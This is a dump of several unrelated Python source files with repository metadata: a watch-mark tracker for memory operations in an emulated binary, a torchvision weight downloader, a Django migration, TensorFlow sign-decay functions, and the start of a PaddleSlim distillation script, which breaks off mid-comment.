def addWatchMark(self, mark, cycles=None, ip=None):
if self.so_map is None:
self.so_map = json.loads(self.top.getSOMap(quiet=True))
if self.so_map is None:
self.lgr.error('watchMarks addWatchMark, so_map is None')
else:
self.lgr.debug('dataWatch addWatchMark got so_map')
if ip is None:
ip = self.mem_utils.getRegValue(self.cpu, 'pc')
pid = self.top.getPID()
if cycles is None:
cycles = self.cpu.cycles
wm = self.WatchMark(cycles, self.call_cycle, ip, pid, mark)
self.mark_list.append(wm)
#self.lgr.debug('addWatchMark len now %d' % len(self.mark_list))
return wm
def isStackBuf(self, dest):
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
if dest >= sp:
return True
else:
return False
def getStackBase(self, dest):
base = None
sp = None
if self.cpu.architecture != 'arm':
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
base = self.mem_utils.getRegValue(self.cpu, 'ebp')
if dest is not None and dest > sp and dest <= base:
''' copy is to a stack buffer. Record so it can be deleted when opportunity arises '''
pass
else:
sp = None
base = None
else:
st = self.top.getStackTraceQuiet(max_frames=2, max_bytes=1000)
if st is None:
self.lgr.debug('getStackBase stack trace is None, wrong pid?')
return
frames = st.getFrames(2)
for f in frames:
self.lgr.debug(f.dumpString())
if len(frames) > 1:
next_frame = frames[1]
if next_frame.instruct.startswith('bl'):
sp = self.mem_utils.getRegValue(self.cpu, 'sp')
base = next_frame.sp
else:
self.lgr.debug('watchMarks getStackBase, next frame does not look like an lr return, unable to delete temporary stack frame?')
return sp, base
def copy(self, src, dest, length, buf_start, op_type, strcpy=False, truncated=None):
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
cm = CopyMark(src, dest, length, buf_start, op_type, strcpy, sp=sp, truncated=truncated)
self.lgr.debug('watchMarks copy %s' % (cm.getMsg()))
#self.removeRedundantDataMark(dest)
wm = self.addWatchMark(cm)
return wm
def memset(self, dest, length, buf_start):
sm = SetMark(dest, length, buf_start, self.lgr)
self.addWatchMark(sm)
self.lgr.debug('watchMarks memset %s' % (sm.getMsg()))
def kernel(self, addr, count, fd, callnum):
km = KernelMark(addr, count, callnum, fd)
self.addWatchMark(km)
self.lgr.debug('watchMarks kernel %s' % (km.getMsg()))
def kernelMod(self, addr, count, frame):
callnum = self.mem_utils.getCallNum(self.cpu)
fd = frame['param1']
km = KernelModMark(addr, count, callnum, fd)
self.addWatchMark(km)
self.lgr.debug('watchMarks kernelMod %s' % (km.getMsg()))
def compare(self, fun, dest, src, count, buf_start):
if count > 0:
dst_str = self.mem_utils.readString(self.cpu, dest, count)
if dst_str is not None:
if (sys.version_info < (3,0)):
self.lgr.debug('watchMarks compare, do decode')
dst_str = dst_str.decode('ascii', 'replace')
src_str = self.mem_utils.readString(self.cpu, src, count)
if src_str is not None:
if (sys.version_info < (3,0)):
self.lgr.debug('watchMarks compare, do decode')
src_str = src_str.decode('ascii', 'replace')
src_str = src_str.replace('\n\r','<newline>')
src_str = src_str.replace('\n','<newline>')
src_str = src_str.replace('\t','<tab>')
#hexstring = ":".join("{:02x}".format(ord(c)) for c in src_str)
#self.lgr.debug('srcdst_string hex is %s' % hexstring)
else:
dst_str = ''
src_str = ''
cm = CompareMark(fun, dest, src, count, dst_str, src_str, buf_start)
self.addWatchMark(cm)
self.lgr.debug('watchMarks compare (%s) %s' % (fun, cm.getMsg()))
def strchr(self, start, the_chr, count):
cm = StrChrMark(start, the_chr, count)
self.removeRedundantDataMark(start)
self.addWatchMark(cm)
self.lgr.debug('watchMarks strchr %s' % (cm.getMsg()))
def strtoul(self, fun, src):
cm = StrtousMark(fun, src)
self.addWatchMark(cm)
self.lgr.debug('watchMarks strtous %s' % (cm.getMsg()))
def sscanf(self, src, dest, count, buf_start):
#sp, base = self.getStackBase(dest)
if dest is not None:
sp = self.isStackBuf(dest)
else:
sp = None
sm = ScanMark(src, dest, count, buf_start, sp)
wm = self.addWatchMark(sm)
self.lgr.debug('watchMarks sscanf %s' % (sm.getMsg()))
return wm
def strlen(self, src, count):
lm = LenMark(src, count)
self.addWatchMark(lm)
self.lgr.debug('watchMarks strlen %s' % (lm.getMsg()))
def sprintf(self, fun, src, dest, count, buf_start):
#sp, base = self.getStackBase(dest)
sp = self.isStackBuf(dest)
lm = SprintfMark(fun, src, dest, count, buf_start, sp)
wm = self.addWatchMark(lm)
self.lgr.debug('watchMarks %s %s' % (fun, lm.getMsg()))
return wm
def fprintf(self, fun, src):
lm = FprintfMark(fun, src)
wm = self.addWatchMark(lm)
self.lgr.debug('watchMarks %s %s' % (fun, lm.getMsg()))
return wm
def fwrite(self, fun, src, count):
wm = FwriteMark(fun, src, count)
self.addWatchMark(wm)
self.lgr.debug('watchMarks %s %s' % (fun, wm.getMsg()))
def glob(self, fun, src, count):
wm = GlobMark(fun, src, count)
self.addWatchMark(wm)
self.lgr.debug('watchMarks %s %s' % (fun, wm.getMsg()))
def inet_addr(self, src, count, the_string):
xm = InetAddrMark(src, count, the_string)
self.addWatchMark(xm)
self.lgr.debug('watchMarks inet_addr %s' % (xm.getMsg()))
def inet_ntop(self, dest, count, the_string):
xm = InetNtopMark(dest, count, the_string)
self.lgr.debug('watchMarks inet_ntop %s' % (xm.getMsg()))
wm = self.addWatchMark(xm)
return wm
def xmlGetProp(self, src, count, the_string, dest):
result = 'Not found'
if dest != 0:
result = self.mem_utils.readString(self.cpu, dest, 20)
xm = XMLPropMark(src, count, the_string, result)
self.addWatchMark(xm)
self.lgr.debug('watchMarks xmlGetProp %s' % (xm.getMsg()))
def iterator(self, fun, src, buf_start):
im = IteratorMark(fun, src, buf_start)
self.addWatchMark(im)
self.lgr.debug('watchMarks iterator %s' % (im.getMsg()))
def malloc(self, addr, size):
mm = MallocMark(addr, size)
self.addWatchMark(mm)
self.lgr.debug('watchMarks malloc %s' % (mm.getMsg()))
def free(self, addr, fun):
if addr is not None:
fm = FreeMark(addr, fun)
self.addWatchMark(fm)
self.lgr.debug('watchMarks free %s' % (fm.getMsg()))
else:
self.lgr.debug('watchMarks free %s but addr is none' % fun)
def freeXMLDoc(self):
fm = FreeXMLMark()
self.addWatchMark(fm)
def xmlParseFile(self, dest, count):
fm = XMLParseFileMark(dest, count)
self.addWatchMark(fm)
def getToken(self, src, dest, the_string):
fm = GetTokenMark(src, dest, the_string)
self.addWatchMark(fm)
def strPtr(self, dest, fun):
the_string = self.mem_utils.readString(self.cpu, dest, 40)
fm = StrPtr(fun, the_string)
self.addWatchMark(fm)
def returnInt(self, count, fun):
fm = ReturnInt(fun, count)
self.addWatchMark(fm)
def logMark(self, s, prefix):
lm = LogMark(s, prefix)
self.addWatchMark(lm)
def pushMark(self, src, dest, buf_start, length, ip):
pm = PushMark(src, dest, buf_start, length, ip, self.mem_utils.WORD_SIZE)
wm = self.addWatchMark(pm)
return wm
def fgetsMark(self, fun, src, dest, count, start):
fm = FGetsMark(fun, src, dest, count, start)
self.addWatchMark(fm)
def stringMark(self, fun, src, dest, count, start):
fm = StringMark(fun, src, dest, count, start)
self.addWatchMark(fm)
def replaceMark(self, fun, src, dest, pos, length, start):
fm = ReplaceMark(fun, src, dest, pos, length, start)
self.addWatchMark(fm)
def appendMark(self, fun, src, dest, length, start):
fm = AppendMark(fun, src, dest, length, start)
self.addWatchMark(fm)
def assignMark(self, fun, src, dest, length, start):
fm = AssignMark(fun, src, dest, length, start)
self.addWatchMark(fm)
def charLookupMark(self, addr, msg, length=None):
add_mark = True
if length is None:
if len(self.mark_list) > 0:
pm = self.mark_list[-1]
if isinstance(pm.mark, CharLookupMark) and addr == (pm.mark.end_addr+1):
pm.mark.extend()
add_mark = False
if add_mark:
cm = CharLookupMark(addr, msg, length)
self.addWatchMark(cm)
def charPtrMark(self, addr, ptr, value):
cm = CharPtrMark(addr, ptr, value)
self.addWatchMark(cm)
def mscMark(self, fun, src):
fm = MscMark(fun, src)
self.addWatchMark(fm)
self.lgr.debug(fm.getMsg())
def clearWatchMarks(self, record_old=False):
self.lgr.debug('watchMarks clearWatchMarks, entered with %d marks and %d stale marks' % (len(self.mark_list), len(self.stale_marks)))
if record_old:
self.stale_marks.extend(self.mark_list)
del self.mark_list[:]
self.mark_list = []
self.prev_ip = []
self.lgr.debug('watchMarks clearWatchMarks, leave with %d marks and %d stale marks' % (len(self.mark_list), len(self.stale_marks)))
def firstBufferAddress(self):
''' address of first buffer '''
retval = None
''' maximum length per initial read '''
max_len = None
for mark in self.mark_list:
self.lgr.debug('check mark type %s' % type(mark.mark))
if isinstance(mark.mark, CallMark) and mark.mark.recv_addr is not None:
self.lgr.debug('watchMarks firstBufferAddress is CallMark addr 0x%x' % mark.mark.recv_addr)
retval = mark.mark.recv_addr
max_len = mark.mark.max_len
break
elif isinstance(mark.mark, DataMark):
self.lgr.debug('watchMarks firstBufferAddress is DataMark addr 0x%x' % mark.mark.start)
retval = mark.mark.start
max_len = self.recent_buf_max_len
break
if retval is not None:
self.recent_buf_address = retval
self.recent_buf_max_len = max_len
self.lgr.debug('watchMarks firstBuffer address 0x%x' % retval)
elif self.recent_buf_address is not None:
#self.lgr.debug('watchMarks firstBufferAddress, no marks, using recent 0x%x' % self.recent_buf_address)
retval = self.recent_buf_address
max_len = self.recent_buf_max_len
else:
self.lgr.error('watchMarks, no recent_buf_address was recorded')
return retval, max_len
def firstBufferIndex(self):
retval = None
index = 1
for mark in self.mark_list:
if isinstance(mark.mark, CallMark) and mark.mark.recv_addr is not None:
self.lgr.debug('watchMarks firstBufferIndex is CallMark addr 0x%x' % mark.mark.recv_addr)
retval = index
break
elif isinstance(mark.mark, DataMark):
self.lgr.debug('watchMarks firstBufferIndex is DataMark addr 0x%x' % mark.mark.start)
retval = index
break
index += 1
return retval
def nextWatchMark(self):
retval = None
cur_cycle = self.cpu.cycles
index = 1
for mark in self.mark_list:
if mark.cycle > cur_cycle:
retval = index
break
index += 1
return retval
def undoMark(self):
self.mark_list.pop()
def latestCycle(self):
if len(self.mark_list) > 0:
latest_mark = self.mark_list[-1]
return latest_mark.cycle
else:
return None
def registerCallCycle(self):
self.call_cycle = self.cpu.cycles
def getCallCycle(self):
return self.call_cycle
def readCount(self):
''' get count of read/recv, i.e., CallMarks having recv_addr values '''
retval = 0
prev_cycle = 0
for mark in self.mark_list:
if isinstance(mark.mark, CallMark):
if mark.mark.recv_addr is not None and mark.call_cycle != prev_cycle:
retval += 1
prev_cycle = mark.call_cycle
return retval
def whichRead(self):
''' Return the number of reads that have occurred prior to this cycle.
Intended to decorate automated backtrace bookmarks with context.'''
found = None
num_reads = 0
self.lgr.debug('watchMarks whichRead')
for mark in reversed(self.mark_list):
if mark.call_cycle is not None and mark.call_cycle > self.cpu.cycles:
continue
self.lgr.debug('watchMarks whichRead mark.mark %s' % str(mark.mark))
if isinstance(mark.mark, CallMark):
if mark.mark.recv_addr is not None:
num_reads += 1
self.lgr.debug('num_reads now %d' % num_reads)
if mark.call_cycle is not None and mark.call_cycle >= self.cpu.cycles:
self.lgr.debug('num_reads found num_reads %d' % num_reads)
found = num_reads
if found is None:
retval = None
else:
retval = num_reads - (found - 1)
return retval
def markCount(self):
return (len(self.mark_list) + len(self.stale_marks))
def getMarks(self):
return self.mark_list
def loadPickle(self, name):
mark_file = os.path.join('./', name, self.cell_name, 'watchMarks.pickle')
if os.path.isfile(mark_file):
pickDict = pickle.load( open(mark_file, 'rb') )
self.recent_buf_address = pickDict['recent_buf_address']
self.recent_buf_max_len = pickDict['recent_buf_max_len']
def pickleit(self, name):
mark_file = os.path.join('./', name, self.cell_name, 'watchMarks.pickle')
pickDict = {}
pickDict['recent_buf_address'] = self.recent_buf_address
pickDict['recent_buf_max_len'] = self.recent_buf_max_len
self.lgr.debug('watchMarks pickleit to %s recent_buf_address: %s' % (mark_file, str(self.recent_buf_address)))
pickle.dump( pickDict, open( mark_file, "wb") )
def saveJson(self, fname, packet=1):
my_marks = []
start_index = 1
self.lgr.debug('watchMarks saveJson %d marks to file %s packet %d' % (len(self.mark_list), fname, packet))
if os.path.isfile(fname):
try:
combined = json.load(open(fname))
my_marks = combined['marks']
start_index = len(my_marks)
self.lgr.debug('watchMarks loaded my_marks with %d marks' % len(my_marks))
except:
my_marks = []
new_marks = self.getJson(self.mark_list, packet=packet, start_index=start_index)
my_marks.extend(new_marks)
with open(fname, 'w') as fh:
combined = {}
combined['somap'] = self.so_map
combined['marks'] = my_marks
json.dump(combined, fh)
def getDataWatchList(self):
''' get list intended for use in reconstructing data watches '''
my_marks = []
for mark in self.mark_list:
if isinstance(mark.mark, ResetOrigin):
for origin_watch in mark.mark.origin_watches:
entry = {}
entry['cycle'] = mark.cycle
entry['start'] = origin_watch['start']
entry['length'] = origin_watch['length']
my_marks.append(entry)
else:
entry = {}
entry['cycle'] = mark.cycle
if isinstance(mark.mark, CopyMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, ScanMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.count
elif isinstance(mark.mark, SprintfMark):
entry['start'] = mark.mark.dest
entry['length'] = mark.mark.count
elif isinstance(mark.mark, CallMark):
entry['start'] = mark.mark.recv_addr
entry['length'] = mark.mark.len
elif isinstance(mark.mark, DataMark) and not mark.mark.modify:
entry['start'] = mark.mark.addr
entry['length'] = mark.mark.trans_size
elif isinstance(mark.mark, DataMark) and mark.mark.modify:
entry['start'] = mark.mark.addr
entry['length'] = mark.mark.trans_size
if 'start' in entry:
my_marks.append(entry)
return my_marks
def getAllJson(self):
self.lgr.debug('getAllJson %d stale and %d new marks' % (len(self.stale_marks), len(self.mark_list)))
all_marks = self.getJson(self.stale_marks)
new_marks = self.getJson(self.mark_list, start_index=len(self.stale_marks))
all_marks.extend(new_marks)
self.lgr.debug('getAllJson returning %d marks' % len(all_marks))
return all_marks
def getJson(self, mark_list, packet=1, start_index=1):
my_marks = []
index = start_index
for mark in mark_list:
entry = {}
entry['ip'] = mark.ip
entry['cycle'] = mark.cycle
entry['packet'] = packet
entry['index'] = index
index = index + 1
#self.lgr.debug('saveJson mark %s' % str(mark.mark))
if isinstance(mark.mark, CopyMark):
entry['mark_type'] = 'copy'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, DataMark) and mark.mark.ad_hoc and mark.mark.start is not None:
entry['mark_type'] = 'copy'
entry['src'] = mark.mark.addr
entry['dest'] = mark.mark.dest
entry['length'] = (mark.mark.end_addr - mark.mark.addr)+1
entry['reference_buffer'] = mark.mark.start
elif isinstance(mark.mark, ScanMark):
entry['mark_type'] = 'scan'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.count
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, SprintfMark):
entry['mark_type'] = 'sprint'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['count'] = mark.mark.count
entry['reference_buffer'] = mark.mark.buf_start
elif isinstance(mark.mark, CallMark):
entry['mark_type'] = 'call'
entry['recv_addr'] = mark.mark.recv_addr
entry['length'] = mark.mark.len
entry['fd'] = mark.mark.fd
elif isinstance(mark.mark, DataMark) and not mark.mark.modify and not mark.mark.ad_hoc:
entry['mark_type'] = 'read'
entry['addr'] = mark.mark.addr
entry['reference_buffer'] = mark.mark.start
entry['trans_size'] = mark.mark.trans_size
entry['value'] = mark.mark.value
elif isinstance(mark.mark, DataMark) and mark.mark.modify:
entry['mark_type'] = 'write'
entry['addr'] = mark.mark.addr
entry['reference_buffer'] = mark.mark.start
entry['trans_size'] = mark.mark.trans_size
elif isinstance(mark.mark, KernelMark):
entry['mark_type'] = 'kernel'
entry['addr'] = mark.mark.addr
entry['count'] = mark.mark.count
entry['callnum'] = mark.mark.callnum
entry['fd'] = mark.mark.fd
elif isinstance(mark.mark, StrChrMark):
entry['mark_type'] = 'strchr'
entry['the_char'] = mark.mark.the_chr
entry['start'] = mark.mark.start
entry['count'] = mark.mark.count
elif isinstance(mark.mark, CompareMark):
entry['mark_type'] = 'compare'
entry['src_str'] = mark.mark.src_str
entry['dst_str'] = mark.mark.dst_str
entry['ours'] = mark.mark.ours
entry['theirs'] = mark.mark.theirs
entry['count'] = mark.mark.count
elif isinstance(mark.mark, StrtousMark):
entry['mark_type'] = 'strt'
entry['src'] = mark.mark.src
elif isinstance(mark.mark, StringMark):
entry['mark_type'] = 'string'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, ReplaceMark):
entry['mark_type'] = 'replace'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['pos'] = mark.mark.pos
entry['length'] = mark.mark.length
elif isinstance(mark.mark, AppendMark):
entry['mark_type'] = 'append'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, AssignMark):
entry['mark_type'] = 'assign'
entry['src'] = mark.mark.src
entry['dest'] = mark.mark.dest
entry['length'] = mark.mark.length
elif isinstance(mark.mark, MscMark):
entry['mark_type'] = 'msc'
entry['src'] = mark.mark.addr
elif isinstance(mark.mark, LenMark):
entry['mark_type'] = 'len'
entry['src'] = mark.mark.src
entry['count'] = mark.mark.count
elif isinstance(mark.mark, CharLookupMark):
entry['mark_type'] = 'char_lookup'
entry['addr'] = mark.mark.addr
entry['length'] = mark.mark.length
entry['stuff'] = mark.mark.stuff
elif isinstance(mark.mark, CharPtrMark):
entry['mark_type'] = 'char_ptr'
entry['addr'] = mark.mark.addr
entry['ptr'] = mark.mark.ptr
entry['value'] = mark.mark.value
elif isinstance(mark.mark, IteratorMark) or isinstance(mark.mark, KernelModMark) or isinstance(mark.mark, SetMark):
continue
else:
self.lgr.debug('unknown mark type? %s' % str(mark.mark))
continue
my_marks.append(entry)
return my_marks
blob_id: e6da989f8714a843e3acd3d6592f26f0f857ec86
directory_id: 38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7
path: /scripts/download_model_urls.py
content_id: f5f53d71e98f1c0c82d74bdb5b6cca122c4090c2
detected_licenses: ["BSD-3-Clause", "CC-BY-NC-4.0"]
license_type: permissive
repo_name: pytorch/vision
snapshot_id: 10443ac1eddf7a32ecb288fe8f58e28cab2a60a1
revision_id: 1f94320d8db8d102214a7dc02c22fa65ee9ac58a
branch_name: refs/heads/main
visit_date: 2023-09-06T03:48:02.303020
revision_date: 2023-09-04T18:25:36
committer_date: 2023-09-04T18:25:36
github_id: 73,328,905
star_events_count: 15,620
fork_events_count: 8,564
gha_license_id: BSD-3-Clause
gha_event_created_at: 2023-09-14T17:52:49
gha_created_at: 2016-11-09T23:11:43
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 1,382
extension: py
filename: download_model_urls.py
content:
import asyncio
import sys
from pathlib import Path
from time import perf_counter
from urllib.parse import urlsplit
import aiofiles
import aiohttp
from torchvision import models
from tqdm.asyncio import tqdm
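# Collect the URL of every registered torchvision model weight and download
# them all concurrently into download_root, one file per weight URL.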
async def main(download_root):
download_root.mkdir(parents=True, exist_ok=True)
urls = {weight.url for name in models.list_models() for weight in iter(models.get_model_weights(name))}
async with aiohttp.ClientSession(timeout=aiohttp.ClientTimeout(total=None)) as session:
await tqdm.gather(*[download(download_root, session, url) for url in urls])
async def download(download_root, session, url):
response = await session.get(url, params=dict(source="ci"))
assert response.ok
file_name = Path(urlsplit(url).path).name
async with aiofiles.open(download_root / file_name, "wb") as f:
async for data in response.content.iter_any():
await f.write(data)
if __name__ == "__main__":
download_root = (
(Path(sys.argv[1]) if len(sys.argv) > 1 else Path("~/.cache/torch/hub/checkpoints")).expanduser().resolve()
)
print(f"Downloading model weights to {download_root}")
start = perf_counter()
asyncio.get_event_loop().run_until_complete(main(download_root))
stop = perf_counter()
minutes, seconds = divmod(stop - start, 60)
print(f"Download took {minutes:2.0f}m {seconds:2.0f}s")
blob_id: b812f805d7535500bd75ad8a12c6564f8bd0a31a
directory_id: 5a3f4e19b8c64410a9a974ddcd34090fb2430515
path: /blogs/migrations/0080_auto_20230301_1332.py
content_id: 0b494d31a143e0f92263c89f82ab8825091307a5
detected_licenses: ["MIT"]
license_type: permissive
repo_name: HermanMartinus/bearblog
snapshot_id: daf41622097cc23378986695ae9c9a3e7ecd3696
revision_id: d5f326037e29658fed3c7b82439504ea7e8f1ab0
branch_name: refs/heads/master
visit_date: 2023-09-01T02:52:22.226777
revision_date: 2023-08-29T09:02:14
committer_date: 2023-08-29T09:02:14
github_id: 266,561,292
star_events_count: 1,768
fork_events_count: 80
gha_license_id: MIT
gha_event_created_at: 2023-05-02T10:32:57
gha_created_at: 2020-05-24T14:44:59
gha_language: CSS
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 404
extension: py
filename: 0080_auto_20230301_1332.py
content:
# Generated by Django 3.1.14 on 2023-03-01 13:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogs', '0079_blog_order_id'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='order_id',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
blob_id: 534f6b8fc606f9f8a6ef2076641440d6134f07d0
directory_id: fbbe424559f64e9a94116a07eaaa555a01b0a7bb
path: /Keras_tensorflow_nightly/source2.7/tensorflow/contrib/opt/python/training/sign_decay.py
content_id: e8870c072110da145c0bb78e20c3584083438ea0
detected_licenses: ["MIT"]
license_type: permissive
repo_name: ryfeus/lambda-packs
snapshot_id: 6544adb4dec19b8e71d75c24d8ed789b785b0369
revision_id: cabf6e4f1970dc14302f87414f170de19944bac2
branch_name: refs/heads/master
visit_date: 2022-12-07T16:18:52.475504
revision_date: 2022-11-29T13:35:35
committer_date: 2022-11-29T13:35:35
github_id: 71,386,735
star_events_count: 1,283
fork_events_count: 263
gha_license_id: MIT
gha_event_created_at: 2022-11-26T05:02:14
gha_created_at: 2016-10-19T18:22:39
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 5,800
extension: py
filename: sign_decay.py
content:
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of the sign decay functions used in PowerSign and AddSign.
See [Bello et al., ICML 2017] Neural Optimizer Search with Reinforcement
Learning for details.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
def get_linear_decay_fn(decay_steps):
"""Returns a function that computes a linear decay.
This decay computes linear annealing:
max(0, (decay_steps - global_step) / decay_steps)
Example usage:
```
decay_steps = 1000
linear_decay_fn = get_linear_decay_fn(decay_steps)
decayed = linear_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
Returns:
linear_decay_fn: a function that computes the linear decay.
"""
# pylint:disable=missing-docstring
def linear_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for linear_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
remaining_steps = math_ops.to_int32(decay_steps) - math_ops.to_int32(
global_step)
decayed = math_ops.to_float(remaining_steps) / math_ops.to_float(
decay_steps)
return math_ops.maximum(0.0, decayed)
# pylint:enable=missing-docstring
return linear_decay_fn
def get_cosine_decay_fn(decay_steps, num_periods=0.5, zero_after=None):
"""Returns a function that computes a cosine decay.
This decay computes cosine annealing:
0.5 * (1.0 + cos(2.0 * pi * num_periods * global_step / decay_steps))
This decay can be used to decay the sign quantity in the AddSign and PowerSign
optimizers discovered in
[Bello et al., ICML 2017] Neural Optimizer Search with RL.
Example usage:
```
decay_steps = 1000
num_periods = 2
cosine_decay_fn = get_cosine_decay_fn(decay_steps, num_periods=num_periods)
decayed = cosine_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
num_periods: number of periods for cosine signal. 0.5 by default,
which maps the last decay step to 0.
zero_after: if not None, number after which the decay function
will just return 0.
Returns:
cosine_decay_fn: a function that computes the cosine decay.
"""
# pylint:disable=missing-docstring
def cosine_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for cosine_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
completed_fraction = math_ops.to_float(global_step) / math_ops.to_float(
decay_steps)
fraction = 2.0 * num_periods * completed_fraction
decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
if zero_after is not None:
decayed = array_ops.where(
math_ops.greater_equal(fraction, 2 * zero_after), 0.0, decayed)
return decayed
# pylint:enable=missing-docstring
return cosine_decay_fn
def get_restart_decay_fn(decay_steps, num_periods=1, zero_after=None):
"""Returns a function that computes a restart decay.
This decay computes
0.5 * (1.0 + cos(pi * ((num_periods * global_step) % decay_steps) / decay_steps))
This is a simplified version of the restart decay introduced in
"SGDR: Stochastic Gradient Descent with Warm Restarts"
by Ilya Loshchilov & Frank Hutter, Proceedings of
ICLR'2017, available at https://arxiv.org/pdf/1608.03983.pdf
This decay can be used to decay the sign quantity in the AddSign and PowerSign
optimizers discovered in
[Bello et al., ICML 2017] Neural Optimizer Search with RL.
Example usage:
```
decay_steps = 1000
num_periods = 2.0
restart_decay_fn = get_restart_decay_fn(decay_steps,
num_periods=num_periods)
decayed = restart_decay_fn(global_step)
x *= decayed
```
Args:
decay_steps: number of steps to decay over.
num_periods: number of periods for cosine signal. 1 by default,
which maps the last decay step to 0.
zero_after: if not None, number after which the decay function
will return 0.
Returns:
restart_decay_fn: a function that computes the restart decay.
"""
# pylint:disable=missing-docstring
def restart_decay_fn(global_step):
if global_step is None:
raise ValueError("global_step is required for cosine_decay.")
global_step = math_ops.minimum(global_step, decay_steps)
num = math_ops.mod(num_periods * math_ops.to_float(global_step),
decay_steps)
fraction = num / math_ops.to_float(decay_steps)
decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
if zero_after is not None:
tmp = math_ops.to_float(
num_periods * global_step) / math_ops.to_float(decay_steps)
decayed = array_ops.where(
math_ops.greater_equal(tmp, zero_after), 0.0, decayed)
return decayed
# pylint:enable=missing-docstring
return restart_decay_fn
blob_id: 479117d0016c752444f0078a182e448896dc9090
directory_id: b04cc98a746d1df457183bc14908094a8be00ba1
path: /demo/distillation/distill.py
content_id: 2adeae58dd2b4a5c8acc9720b035b3c4cb586f13
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: PaddlePaddle/PaddleSlim
snapshot_id: a3bcaef0c92016b7f6946d58787f87c7db8ff3f8
revision_id: bb02b103a89a09635941bc0bbbd38506d7412468
branch_name: refs/heads/develop
visit_date: 2023-08-31T01:47:27.824722
revision_date: 2023-08-25T08:06:08
committer_date: 2023-08-25T08:06:08
github_id: 228,290,594
star_events_count: 1,534
fork_events_count: 402
gha_license_id: Apache-2.0
gha_event_created_at: 2023-08-29T09:37:55
gha_created_at: 2019-12-16T02:56:50
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 9,850
extension: py
filename: distill.py
content:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import math
import logging
import paddle
import argparse
import functools
import numpy as np
sys.path[0] = os.path.join(os.path.dirname(__file__), os.path.pardir)
import models
from utility import add_arguments, print_arguments, _download, _decompress
from paddleslim.dist import merge, l2, soft_label
from paddle.distributed import fleet
from paddle.distributed.fleet import DistributedStrategy
logging.basicConfig(format='%(asctime)s-%(levelname)s: %(message)s')
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.INFO)
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 256, "Minibatch size.")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('save_inference', bool, False, "Whether to save inference model.")
add_arg('total_images', int, 1281167, "Training image number.")
add_arg('image_shape', str, "3,224,224", "Input image size")
add_arg('lr', float, 0.1, "The learning rate used to fine-tune pruned model.")
add_arg('lr_strategy', str, "piecewise_decay", "The learning rate decay strategy.")
add_arg('l2_decay', float, 3e-5, "The l2_decay parameter.")
add_arg('momentum_rate', float, 0.9, "The value of momentum_rate.")
add_arg('num_epochs', int, 120, "The number of total epochs.")
add_arg('data', str, "imagenet", "Which data to use. 'cifar10' or 'imagenet'")
add_arg('log_period', int, 20, "Log period in batches.")
add_arg('model', str, "MobileNet", "Set the network to use.")
add_arg('pretrained_model', str, None, "The path of the pretrained model to initialize the student network, if any.")
add_arg('teacher_model', str, "ResNet50_vd", "Set the teacher network to use.")
add_arg('teacher_pretrained_model', str, "./ResNet50_vd_pretrained", "The path of the pretrained teacher model.")
parser.add_argument('--step_epochs', nargs='+', type=int, default=[30, 60, 90], help="piecewise decay step")
# yapf: enable
model_list = [m for m in dir(models) if "__" not in m]
def piecewise_decay(args):
step = int(math.ceil(float(args.total_images) / args.batch_size))
bd = [step * e for e in args.step_epochs]
lr = [args.lr * (0.1**i) for i in range(len(bd) + 1)]
learning_rate = paddle.optimizer.lr.PiecewiseDecay(
boundaries=bd, values=lr, verbose=False)
optimizer = paddle.optimizer.Momentum(
learning_rate=learning_rate,
momentum=args.momentum_rate,
weight_decay=paddle.regularizer.L2Decay(args.l2_decay))
return learning_rate, optimizer
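# Worked example (illustrative only, not part of the original script): with the default
# arguments (total_images=1281167, batch_size=256, lr=0.1, step_epochs=[30, 60, 90]) the
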